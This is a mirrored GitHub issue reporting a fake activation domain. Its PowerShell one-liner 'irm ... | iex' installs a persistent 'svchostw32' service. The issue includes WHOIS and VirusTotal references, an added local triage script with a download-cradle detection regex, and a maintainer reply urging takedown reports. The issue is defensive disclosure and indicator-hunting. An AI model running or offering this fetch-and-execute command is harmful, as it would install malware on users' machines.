[GH-ISSUE #1299] Attention! malicious domain actiwated[.]win. #888

Closed
opened 2026-02-27 10:13:15 +03:00 by kerem · 1 comment

Originally created by @Dominator-3000 on GitHub (Feb 9, 2026).
Original GitHub issue: https://github.com/massgravel/Microsoft-Activation-Scripts/issues/1299

Hello!

I found the malicious domain actiwated[.]win.

When executed from PowerShell irm https://get.actiwated[.]win | iex, it creates the svchostw32 service and persists in the system!

Domain Information:

Domain Name: actiwated[.]win
Registry Domain ID: REDACTED FOR PRIVACY
Registrar WHOIS Server: whois.gathernames.com
Registrar URL: https://www.gname.com/
Updated Date: 2025-12-26T10:15:27Z
Creation Date: 2025-10-27T10:15:24Z
Registry Expiry Date: 2026-10-27T10:15:24Z

More information:
https://www.virustotal.com/gui/file/80f959b0969f8680c9b5ecc55cef44d7c208435f10918fb7412fc95beabab06a/relations
https://opentip.kaspersky.com/80F959B0969F8680C9B5ECC55CEF44D7C208435F10918FB7412FC95BEABAB06A/static

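For anyone triaging a host against the indicators in this report, here is a defender-side check script. It is an added example, not code from the issue, from MAS, or from the reporter. It only looks at local state and does not contact the domain: it checks whether the reported service name is registered, whether the reported domain appears in the DNS client cache, and whether PowerShell script-block logs contain a download cradle (`irm`/`iwr` piped into `iex`) that references the domain. It assumes it runs with local administrator rights and that script-block logging (Event ID 4104) is enabled; without that logging the event query simply returns nothing.

```powershell
# Added example (not from the issue): local triage for the indicators reported above.
# Assumptions: run as local administrator; script-block logging (Event ID 4104) is
# enabled, otherwise step 3 finds nothing. No network connection is made.

$Domain      = 'actiwated.win'   # reported domain, de-fanged in the report as actiwated[.]win
$ServiceName = 'svchostw32'      # service name given in the report

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Service persistence: is a service with the reported name registered?
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name = '$ServiceName'" -ErrorAction SilentlyContinue
if ($svc) {
    $findings.Add("Service '$ServiceName' present: State=$($svc.State) StartMode=$($svc.StartMode) Path=$($svc.PathName)")
}

# 2. DNS client cache: has this host resolved the reported domain recently?
$dnsHits = Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object { $_.Entry -like "*$Domain*" }
foreach ($entry in $dnsHits) {
    $findings.Add("DNS cache entry: $($entry.Entry) -> $($entry.Data)")
}

# 3. Script-block logs: look for a download cradle that references the domain.
#    Matches irm/Invoke-RestMethod or iwr/Invoke-WebRequest piped into iex/Invoke-Expression.
$cradlePattern = '(?i)\b(irm|Invoke-RestMethod|iwr|Invoke-WebRequest)\b.*\|\s*(iex|Invoke-Expression)\b'
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
foreach ($ev in $events) {
    $text = $ev.Message
    if ($text -match [regex]::Escape($Domain) -and $text -match $cradlePattern) {
        $findings.Add("Script-block log at $($ev.TimeCreated): download cradle referencing $Domain")
    }
}

# Report results. Any hit warrants isolating the host and collecting the service binary
# named in PathName for analysis rather than just deleting it.
if ($findings.Count -eq 0) {
    Write-Output "No indicators from the report found on $env:COMPUTERNAME."
} else {
    Write-Output "Indicators found on $env:COMPUTERNAME:"
    $findings | ForEach-Object { Write-Output "  - $_" }
}
```

The DNS cache check is the weakest of the three signals: the cache is flushed on reboot and entries expire by TTL, so an empty result does not clear the host. The service check and the script-block logs are the durable evidence; if the service is present, preserve the binary referenced by its path before remediating so the sample can be compared against the hash in the VirusTotal link above.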
kerem closed this issue 2026-02-27 10:13:15 +03:00

@ave9858 commented on GitHub (Feb 10, 2026):

Hi, thanks for reporting. We recently started investigating this malware after someone shared a different URL that executes this same payload. All we can really do is ask the community to report all the URLs involved to the hosting providers and domain registrars. For example, the URL you reported is hosted on Cloudflare so you could report it to them, and also to GNAME to try and get the domain taken down.
